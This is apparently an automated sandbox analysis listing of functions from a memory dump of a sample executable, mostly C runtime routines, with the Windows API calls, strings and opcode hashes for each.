Function 0042857D Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00428578,?,?,00000008,?,?,00428210,00000000), ref: 004287AA

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 5ef4d00b5429483db4ee21fa4326bc925bf0c13a1e125d06c7f23f728c6050ca
Instruction ID: 7ee8650f83220fdd883e25b8fb9bd1314921049ff4237cec4aadef3bc0018f13
Opcode Fuzzy Hash: 5ef4d00b5429483db4ee21fa4326bc925bf0c13a1e125d06c7f23f728c6050ca
Instruction Fuzzy Hash: 38B17C31211618CFD718CF28D486B697BA0FF44364FA5865DE899CF3A1CB39E992CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00418967 Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0041897D

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 3e8caeb6bfef737ed616e744e7bca8f82915d963378d3ddd84fda9c9aae8233d
Instruction ID: 930e07020ffdb23925cbd3b9f6792be66dda1da8ea5e653575129db29331b3e6
Opcode Fuzzy Hash: 3e8caeb6bfef737ed616e744e7bca8f82915d963378d3ddd84fda9c9aae8233d
Instruction Fuzzy Hash: EC517AB2A102158BDB18CF55DA917AABBF4FB48394F24842FD801EB350D778AD41CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00420C88 Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 022df617a6a97238b54203123924cf70bb7f092af4fd1c9094ef73ba4957732d
Instruction ID: 0328ba7611a17a77fc9fa70e32aa860e7f499fe8194037fa27d83726f3353cb5
Opcode Fuzzy Hash: 022df617a6a97238b54203123924cf70bb7f092af4fd1c9094ef73ba4957732d
Instruction Fuzzy Hash: 9941D9B590422CAFDB24DF69DC89AEABBB8EF45304F5402DEE40DD3202D6355D848F54

Uniqueness

Uniqueness Score: -1.00%

Function 00418CAC Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00018CB8,004187B1), ref: 00418CB1

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: d6e99fe2a3e00c7e8795d25e94eaf0f7e14de702cc9eb68ebfb380ab2ec16c2e
Instruction ID: 746b8b48521946ac0cb7c0911af6d740726ccd679edd01843d8e5942db247f9b
Opcode Fuzzy Hash: d6e99fe2a3e00c7e8795d25e94eaf0f7e14de702cc9eb68ebfb380ab2ec16c2e
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00421EDE Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00421EDE

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 71cfc615a41c3298b5445f93b53bef01396a23fbd50f63aed53a6d59f7cf4ae4
Instruction ID: 5df0cfe7b3464aa7b9b66a1b639ee44698724d998aaf17deffbb5b24500d1645
Opcode Fuzzy Hash: 71cfc615a41c3298b5445f93b53bef01396a23fbd50f63aed53a6d59f7cf4ae4
Instruction Fuzzy Hash: 06A011302002008BAB008F30AA88B283AE8AA082E03A800B8A008C8020EB208088AA0C

Uniqueness

Uniqueness Score: -1.00%

Function 00429560 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 16de03951b86b8feeabb23d9e4c0640400c7f2996d7e90273d9835788c3a6ac4
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: FD1126773010A1A3D6068A2DF8F46B7A395EBC6321FAD426BC0424B74CC36ADDC19508

Uniqueness

Uniqueness Score: -1.00%

Function 006E3F4B Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.314298922.00000000006E3000.00000040.00000020.00020000.00000000.sdmp, Offset: 006E3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e3000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: dac2698801bf5029e7279f8b784b03df05ad802ec424b502f9e4816e36086835
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: F611CE72740210AFDB40CF56DC85FA273FAEB88320B298069ED08CB356D675EC02C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0041DFE2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38dd18e236bff778ebfac104873e99183c47078571e48966eb6fb82665c9afe8
Instruction ID: 2dbb804fcf195cc8c59a6eee79191894b8e3f54bc0695bd72d83ca6bbf0caf24
Opcode Fuzzy Hash: 38dd18e236bff778ebfac104873e99183c47078571e48966eb6fb82665c9afe8
Instruction Fuzzy Hash: 8EE08632911238EBCB14DB89C50898AF7ECE748B44B11455BF901D3100C2B4DE40C7D4

Uniqueness

Uniqueness Score: -1.00%

Function 004037D0 Relevance: 27.2, APIs: 18, Instructions: 209memoryCOMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 00403822
GetProcessHeap.KERNEL32(00000008,?), ref: 00403837
HeapAlloc.KERNEL32(00000000), ref: 0040383A
GetUserNameW.ADVAPI32(00000000,?), ref: 00403848
LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 0040386B
GetProcessHeap.KERNEL32(00000008,?), ref: 00403876
HeapAlloc.KERNEL32(00000000), ref: 00403879
GetProcessHeap.KERNEL32(00000008,?), ref: 00403889
HeapAlloc.KERNEL32(00000000), ref: 0040388C
LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 004038B6
ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 004038C9
GetProcessHeap.KERNEL32(00000000,?), ref: 004039C5
HeapFree.KERNEL32(00000000), ref: 004039CE
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004039D3
HeapFree.KERNEL32(00000000), ref: 004039D6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004039DD
HeapFree.KERNEL32(00000000), ref: 004039E0
LocalFree.KERNEL32(00000000), ref: 004039E5

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$FreeName$Alloc$AccountLookupUser$ConvertLocalString
String ID:
API String ID: 3326663573-0
Opcode ID: 49428334a3cb8c5dc93c7d480cad54d6ea37dc6ea1b61049bcf977d5b361213f
Instruction ID: 89794ae1973fad5ea7192e5804e0dc8d95b01a905eaed68a0387455b0bbf754c
Opcode Fuzzy Hash: 49428334a3cb8c5dc93c7d480cad54d6ea37dc6ea1b61049bcf977d5b361213f
Instruction Fuzzy Hash: 857160B1E00209ABDB14DFA5DC85BAFBFBCEF49300F40453AE905A7281DB759905CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004226F1 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00422735

Part of subcall function 004222CE: _free.LIBCMT ref: 004222EB
Part of subcall function 004222CE: _free.LIBCMT ref: 004222FD
Part of subcall function 004222CE: _free.LIBCMT ref: 0042230F
Part of subcall function 004222CE: _free.LIBCMT ref: 00422321
Part of subcall function 004222CE: _free.LIBCMT ref: 00422333
Part of subcall function 004222CE: _free.LIBCMT ref: 00422345
Part of subcall function 004222CE: _free.LIBCMT ref: 00422357
Part of subcall function 004222CE: _free.LIBCMT ref: 00422369
Part of subcall function 004222CE: _free.LIBCMT ref: 0042237B
Part of subcall function 004222CE: _free.LIBCMT ref: 0042238D
Part of subcall function 004222CE: _free.LIBCMT ref: 0042239F
Part of subcall function 004222CE: _free.LIBCMT ref: 004223B1
Part of subcall function 004222CE: _free.LIBCMT ref: 004223C3

_free.LIBCMT ref: 0042272A

Part of subcall function 0041E681: HeapFree.KERNEL32(00000000,00000000,?,0042245F,?,00000000,?,?,?,00422486,?,00000007,?,?,00422888,?), ref: 0041E697
Part of subcall function 0041E681: GetLastError.KERNEL32(?,?,0042245F,?,00000000,?,?,?,00422486,?,00000007,?,?,00422888,?,?), ref: 0041E6A9

_free.LIBCMT ref: 0042274C
_free.LIBCMT ref: 00422761
_free.LIBCMT ref: 0042276C
_free.LIBCMT ref: 0042278E
_free.LIBCMT ref: 004227A1
_free.LIBCMT ref: 004227AF
_free.LIBCMT ref: 004227BA
_free.LIBCMT ref: 004227F2
_free.LIBCMT ref: 004227F9
_free.LIBCMT ref: 00422816
_free.LIBCMT ref: 0042282E

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: ebc5cb21bf1c7959a8495938e285af39c5308b391aaf683f17be292b00f8d591
Instruction ID: 461f1e78c3464bc4a48008cddc69d5b42509e70b2aac72d5241b0bc94f255431
Opcode Fuzzy Hash: ebc5cb21bf1c7959a8495938e285af39c5308b391aaf683f17be292b00f8d591
Instruction Fuzzy Hash: 0E316031B04311EFDB20AA3AE945B9773E8AF50314F91452FE845D7251DBB8EC92872C

Uniqueness

Uniqueness Score: -1.00%

Function 00419C07 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 308COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 00419D02
type_info::operator==.LIBVCRUNTIME ref: 00419D29
___TypeMatch.LIBVCRUNTIME ref: 00419E35
IsInExceptionSpec.LIBVCRUNTIME ref: 00419F10
_UnwindNestedFrames.LIBCMT ref: 00419F97
CallUnexpected.LIBVCRUNTIME ref: 00419FB2

Strings

csm, xrefs: 00419CAF
csm, xrefs: 00419C42
csm, xrefs: 00419D60

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: 6a5e155c9986efd97b7d459fbe106e95df93c5a924db6e052d510ffac938e950
Instruction ID: 55aba353ce1f2b03f7557c62acf52ca59a8224d4baa2e58a88d4b1d7c662f595
Opcode Fuzzy Hash: 6a5e155c9986efd97b7d459fbe106e95df93c5a924db6e052d510ffac938e950
Instruction Fuzzy Hash: D9C18B71900209AFCF29DFA5C8919EEBBB5BF14314F04415BE815AB242D339DD92CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041EE5A Relevance: 15.1, APIs: 10, Instructions: 70COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0041EE70

Part of subcall function 0041E681: HeapFree.KERNEL32(00000000,00000000,?,0042245F,?,00000000,?,?,?,00422486,?,00000007,?,?,00422888,?), ref: 0041E697
Part of subcall function 0041E681: GetLastError.KERNEL32(?,?,0042245F,?,00000000,?,?,?,00422486,?,00000007,?,?,00422888,?,?), ref: 0041E6A9

_free.LIBCMT ref: 0041EE7C
_free.LIBCMT ref: 0041EE87
_free.LIBCMT ref: 0041EE92
_free.LIBCMT ref: 0041EE9D
_free.LIBCMT ref: 0041EEA8
_free.LIBCMT ref: 0041EEB3
_free.LIBCMT ref: 0041EEBE
_free.LIBCMT ref: 0041EEC9
_free.LIBCMT ref: 0041EED7

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f30e698eb1c1ff19beb48a09c14b1ed35e428e17ffab047da0a82443fd473b72
Instruction ID: 06351b20bf99703dcd7bf9b8d39c0ae7e0177a32b915429fb414c1ff2a1cc787
Opcode Fuzzy Hash: f30e698eb1c1ff19beb48a09c14b1ed35e428e17ffab047da0a82443fd473b72
Instruction Fuzzy Hash: 4321EABA940208EFCF41EF96C841CDE7BB8AF18344B81416AF9159B121EB35DA95CB84

Uniqueness

Uniqueness Score: -1.00%

Function 00427D13 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0042767F), ref: 00427D2C

Strings

pow, xrefs: 00427DCA, 00427E74, 00427EC1
log10, xrefs: 00427D6E, 00427D7D
asin, xrefs: 00427E59
sqrt, xrefs: 00427E6B
exp, xrefs: 00427DAB, 00427E10
log, xrefs: 00427D89, 00427D98
acos, xrefs: 00427E62

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: 43d1fcc8e3c27067cf0fe46aebf70cd92f7bd8f29e8a0d1e94542de1873b69ac
Instruction ID: 06daac8c886ad40bfc3f5fc7b7f7e77c663449c06db021f2b6458f19738d1afc
Opcode Fuzzy Hash: 43d1fcc8e3c27067cf0fe46aebf70cd92f7bd8f29e8a0d1e94542de1873b69ac
Instruction Fuzzy Hash: 12517170A0852ACBCF149F58F9481AEBFB0FF49305F924096E441A7264C77C9D5A8B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00426672 Relevance: 13.8, APIs: 9, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b607198fc18c4977b59bfda8267b468835187ce52ba6938479eef1a471207c7
Instruction ID: c3b722db2c5acca593ef2b985c6e8c5028b49e802bec8f04f8f593b2d7ca9a6e
Opcode Fuzzy Hash: 0b607198fc18c4977b59bfda8267b468835187ce52ba6938479eef1a471207c7
Instruction Fuzzy Hash: 9EC1F7B0F042559FDF11DF99E880BAE7BB0BF49304F91405BE941A7392C7789982CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00421B09 Relevance: 12.2, APIs: 8, Instructions: 203COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00421B33
_free.LIBCMT ref: 00421C0C
_free.LIBCMT ref: 00421C39

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: 03f36e046b91981e3c1c6dd44dd11d7b0534c91b7869a7ac2354f936c8b3a0a3
Instruction ID: 5262ae90983e57a577d1a6d47923df6c9a1a1cc28a3224689016cc5a84fe2567
Opcode Fuzzy Hash: 03f36e046b91981e3c1c6dd44dd11d7b0534c91b7869a7ac2354f936c8b3a0a3
Instruction Fuzzy Hash: 5F517E70F40324EFEB10AF76A88199E7BB4AF21314F94406FE91097262EE3D9941CB4D

Uniqueness

Uniqueness Score: -1.00%

Function 004195B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 004195E7
___except_validate_context_record.LIBVCRUNTIME ref: 004195EF
_ValidateLocalCookies.LIBCMT ref: 00419678
__IsNonwritableInCurrentImage.LIBCMT ref: 004196A3
_ValidateLocalCookies.LIBCMT ref: 004196F8

Strings

csm, xrefs: 0041968D

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 6828d5380a72ecfa71335a635a27c0c7d09dca2ea54c9a1ae805d57ddbe0929f
Instruction ID: 5178301fb53efe35cb3bc6ec9000bbd01032083e63e087f95639f1ef71daa0d4
Opcode Fuzzy Hash: 6828d5380a72ecfa71335a635a27c0c7d09dca2ea54c9a1ae805d57ddbe0929f
Instruction Fuzzy Hash: 8A41EA34A00218ABCF10DF69C894ADE7BB1BF45328F14816BE8145B352D739DE95CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041F22E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

api-ms-, xrefs: 0041F285
ext-ms-, xrefs: 0041F299

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: d4fe4988d1e008e1d7e07dcec31a112dd2843d1347c14ae552424f50b02a7110
Instruction ID: d7f8f66c5accd2a474fa2c9e550e026180df2d9793049625905f73b7f49e49c8
Opcode Fuzzy Hash: d4fe4988d1e008e1d7e07dcec31a112dd2843d1347c14ae552424f50b02a7110
Instruction Fuzzy Hash: 16212E79A01210EBCB3197649C40AEB37689B05760F610273ED06E73D1D639ED4B85DC

Uniqueness

Uniqueness Score: -1.00%

Function 0042246D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00422435: _free.LIBCMT ref: 0042245A

_free.LIBCMT ref: 004224BB

Part of subcall function 0041E681: HeapFree.KERNEL32(00000000,00000000,?,0042245F,?,00000000,?,?,?,00422486,?,00000007,?,?,00422888,?), ref: 0041E697
Part of subcall function 0041E681: GetLastError.KERNEL32(?,?,0042245F,?,00000000,?,?,?,00422486,?,00000007,?,?,00422888,?,?), ref: 0041E6A9

_free.LIBCMT ref: 004224C6
_free.LIBCMT ref: 004224D1
_free.LIBCMT ref: 00422525
_free.LIBCMT ref: 00422530
_free.LIBCMT ref: 0042253B
_free.LIBCMT ref: 00422546

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 2de8991c6391308a96b103f83ccd72a3c81e24415d01b5e1f5153397f2b628c1
Instruction ID: 58f4e587e69a32dac6c23b689706d054278821061d6879d412644195358b7cbe
Opcode Fuzzy Hash: 2de8991c6391308a96b103f83ccd72a3c81e24415d01b5e1f5153397f2b628c1
Instruction Fuzzy Hash: 7911B431A40B18FAD920BFB2DD47FCBB7DC5F08304FC0481EB699A6052D6ACB5514648

Uniqueness

Uniqueness Score: -1.00%

Function 00423B28 Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,004058A0,00000000), ref: 00423B70
__fassign.LIBCMT ref: 00423D4F
__fassign.LIBCMT ref: 00423D6C
WriteFile.KERNEL32(?,004058A0,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00423DB4
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00423DF4
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00423EA0

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: 398e7761831c6a10ae857aa9721353ed2b132615db7f716761bb2a6aa914b76f
Instruction ID: a467c14f7ebf387d8f292150a90acf63a4f3dd59af87892f088fdbcdb0a48f83
Opcode Fuzzy Hash: 398e7761831c6a10ae857aa9721353ed2b132615db7f716761bb2a6aa914b76f
Instruction Fuzzy Hash: 72D19F71E002689FCF15CFA8D8809EDBBB5BF49314F64016AE855B7342D738AE46CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004198D0 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,004198C7,004194B7,00418CFC), ref: 004198DE
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004198EC
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00419905
SetLastError.KERNEL32(00000000,004198C7,004194B7,00418CFC), ref: 00419957

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 0f6e51aa0c255468b6a622d8c735b9b5b069fdda8c7ed9770d7dbe64c9198e0d
Instruction ID: dfdc178befc3424474c629a448357edf8bf4b92ab251d18c35ab581d65446efd
Opcode Fuzzy Hash: 0f6e51aa0c255468b6a622d8c735b9b5b069fdda8c7ed9770d7dbe64c9198e0d
Instruction Fuzzy Hash: 7101F5726193115EE6282676BD959E72774EB05778320023FF210852E0EB590C85D58D

Uniqueness

Uniqueness Score: -1.00%

Function 0042105E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\file.exe, xrefs: 00421063

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\Desktop\file.exe
API String ID: 0-1957095476
Opcode ID: 87dee6722e1b6ccd551237ea2535ba9f7b479b31bc556fd5bfd9a7fcbd75ff9b
Instruction ID: d9f0d1edbe79c721972c5de009bde6595bd14974265b531d28add2f36aac6c1f
Opcode Fuzzy Hash: 87dee6722e1b6ccd551237ea2535ba9f7b479b31bc556fd5bfd9a7fcbd75ff9b
Instruction Fuzzy Hash: 1021F871700125AFDB20AF62ACC186B776CEF14368790452BF91593261DB38EC9187A8

Uniqueness

Uniqueness Score: -1.00%

Function 0041C4B6 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 0041C4F8

Strings

.exe, xrefs: 0041C505
.com, xrefs: 0041C538
.cmd, xrefs: 0041C516
.bat, xrefs: 0041C527

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: 570c69b01f606cfad589b38b12c5c8273c60fca63bd2e970eee5f9d36b6f2e4e
Instruction ID: 010fe26d956af5bd087513acdd8c981cfa3e4b5d319970c9fb4408be828d902b
Opcode Fuzzy Hash: 570c69b01f606cfad589b38b12c5c8273c60fca63bd2e970eee5f9d36b6f2e4e
Instruction Fuzzy Hash: 0D01E537684636352614211AAC427B717A99BDABB4B25012FFC44F72C1FE8CEC8251DC

Uniqueness

Uniqueness Score: -1.00%

Function 0041A977 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

Strings

api-ms-, xrefs: 0041A9C7

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID: api-ms-
API String ID: 0-2084034818
Opcode ID: 320331af6566cb962ace0647e76be2ad38b69705adbc3407a77f9eddf13dbea2
Instruction ID: cadd73a2a830a1b03fc792233cfe60f62a5f785435c8c8d28cbd2197b084f308
Opcode Fuzzy Hash: 320331af6566cb962ace0647e76be2ad38b69705adbc3407a77f9eddf13dbea2
Instruction Fuzzy Hash: A311DA71B12221EBC7324B249D44AAB77649F017E4B510533EE05A7391D738DDE1C6DE

Uniqueness

Uniqueness Score: -1.00%

